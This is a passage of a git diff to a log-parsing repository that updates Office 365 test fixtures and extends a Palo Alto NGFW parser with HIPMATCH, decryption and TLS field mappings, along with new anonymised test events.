IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}", + "event": { + "action": "UpdateInboxRules", + "category": [ + "email", + "file" + ], + "code": "2", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-23T12:26:18Z", + "action": { + "id": 2, + "name": "UpdateInboxRules", + "outcome": "success", + "target": "user" + }, + "office365": { + "context": { + "aad_session_id": "xxxx-xxx-xxx-xxxx" + }, + "exchange": { + "mailbox_guid": "xxxx-xxx-xxx-xxxx" + }, + "operation": { + "properties": { + "RuleActions": [ + { + "ActionType": "Forward", + "ForwardFlags": "None", + "Recipients": [ + "user.name@mail.fr" + ] + } + ], + "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}", + "RuleId": 4561233110666051585, + "RuleOperation": "ModifyMailboxRule", + "RuleProvider": "RuleOrganizer", + "RuleState": "Enabled" + } + }, + "record_type": 2, + "result_status": "Succeeded", + "user_type": { + "code": 0, + "is_external": false, + "name": "Regular" + } + }, + "organization": { + "id": "xxxx-xxx-xxx-xxxx" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe@mail.fr" + ] + }, + "service": { + "name": "Exchange" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "john.doe@mail.fr", + "id": "S-1-2-3", + "name": "john.doe@mail.fr" + } + } +} \ No newline at end of file diff --git a/Office 365/o365/tests/power_bi.json b/Office 365/o365/tests/power_bi.json index 04a388971..186958235 100644 --- a/Office 365/o365/tests/power_bi.json +++ b/Office 365/o365/tests/power_bi.json @@ -23,6 +23,7 @@ "record_type": 20, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/remove_member_from_role.json b/Office 365/o365/tests/remove_member_from_role.json index 5feefc067..cd39a1c92 100644 --- a/Office 365/o365/tests/remove_member_from_role.json +++ b/Office 365/o365/tests/remove_member_from_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/security_compliance_alert.json b/Office 365/o365/tests/security_compliance_alert.json index 9988fb1fe..f3d73bb7d 100644 --- a/Office 365/o365/tests/security_compliance_alert.json +++ b/Office 365/o365/tests/security_compliance_alert.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_2.json b/Office 365/o365/tests/security_compliance_alert_2.json index 43cac929e..b52c6c789 100644 --- a/Office 365/o365/tests/security_compliance_alert_2.json +++ b/Office 365/o365/tests/security_compliance_alert_2.json @@ -65,6 +65,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_3.json b/Office 365/o365/tests/security_compliance_alert_3.json index 4a695584b..693cae46a 100644 --- a/Office 365/o365/tests/security_compliance_alert_3.json +++ b/Office 365/o365/tests/security_compliance_alert_3.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_4.json b/Office 365/o365/tests/security_compliance_alert_4.json index a6b83cc30..33fb22e5d 100644 --- a/Office 365/o365/tests/security_compliance_alert_4.json +++ b/Office 365/o365/tests/security_compliance_alert_4.json @@ -59,6 +59,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_5.json b/Office 365/o365/tests/security_compliance_alert_5.json index f0e153b7e..517d9efea 100644 --- a/Office 365/o365/tests/security_compliance_alert_5.json +++ b/Office 365/o365/tests/security_compliance_alert_5.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json index 0775bbdc8..062affbb5 100644 --- a/Office 365/o365/tests/security_compliance_alert_7.json +++ b/Office 365/o365/tests/security_compliance_alert_7.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json index 7bb99fa1d..43e51bb06 100644 --- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json @@ -53,6 +53,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json index 95ecbad6c..488df5065 100644 --- a/Office 365/o365/tests/source_log.json +++ b/Office 365/o365/tests/source_log.json @@ -48,6 +48,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json index ec3137b79..f881d49d9 100644 --- a/Office 365/o365/tests/targetusername.json +++ b/Office 365/o365/tests/targetusername.json @@ -58,6 +58,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_message_has_link.json b/Office 365/o365/tests/teams_message_has_link.json index cbb5caa76..03b584a02 100644 --- a/Office 365/o365/tests/teams_message_has_link.json +++ b/Office 365/o365/tests/teams_message_has_link.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users.json b/Office 365/o365/tests/teams_with_foreign_tenant_users.json index 5b1e6802d..83f3436b7 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json index fed58f479..ecbdcb18f 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_2.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json index 727b939ce..34e139dff 100644 --- a/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json +++ b/Office 365/o365/tests/teams_with_foreign_tenant_users_3.json @@ -44,6 +44,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_without_foreign_tenant_users.json b/Office 365/o365/tests/teams_without_foreign_tenant_users.json index e22534f43..82ca31d6c 100644 --- a/Office 365/o365/tests/teams_without_foreign_tenant_users.json +++ b/Office 365/o365/tests/teams_without_foreign_tenant_users.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/threat_intel.json b/Office 365/o365/tests/threat_intel.json index f2bd901be..3b4c44e60 100644 --- a/Office 365/o365/tests/threat_intel.json +++ b/Office 365/o365/tests/threat_intel.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/update_group.json b/Office 365/o365/tests/update_group.json index 20ba82d4d..7bd2bc5a7 100644 --- a/Office 365/o365/tests/update_group.json +++ b/Office 365/o365/tests/update_group.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user.json b/Office 365/o365/tests/update_user.json index b8b43939e..268397a3f 100644 --- a/Office 365/o365/tests/update_user.json +++ b/Office 365/o365/tests/update_user.json @@ -30,6 +30,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/update_user_empty_source_ip.json b/Office 365/o365/tests/update_user_empty_source_ip.json index cd658f9a4..22759d202 100644 --- a/Office 365/o365/tests/update_user_empty_source_ip.json +++ b/Office 365/o365/tests/update_user_empty_source_ip.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in.json b/Office 365/o365/tests/user_logged_in.json index 1cb5385fb..f982e5996 100644 --- a/Office 365/o365/tests/user_logged_in.json +++ b/Office 365/o365/tests/user_logged_in.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in_2.json b/Office 365/o365/tests/user_logged_in_2.json index 93fab6554..563567dc8 100644 --- a/Office 365/o365/tests/user_logged_in_2.json +++ b/Office 365/o365/tests/user_logged_in_2.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_login_failed.json b/Office 365/o365/tests/user_login_failed.json index 9156612dc..21fc55744 100644 --- a/Office 365/o365/tests/user_login_failed.json +++ b/Office 365/o365/tests/user_login_failed.json @@ -55,6 +55,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c6cf58abe 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse @@ -465,7 +626,7 @@ pipeline: AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}" REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}' REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}" - REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}" + REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?" REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}" REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.' filter: '{{parsed_event.message.get("EventDescription") != None}}' @@ -592,7 +753,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -608,6 +769,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -617,7 +785,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" @@ -752,6 +920,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} @@ -810,8 +981,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json @@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": 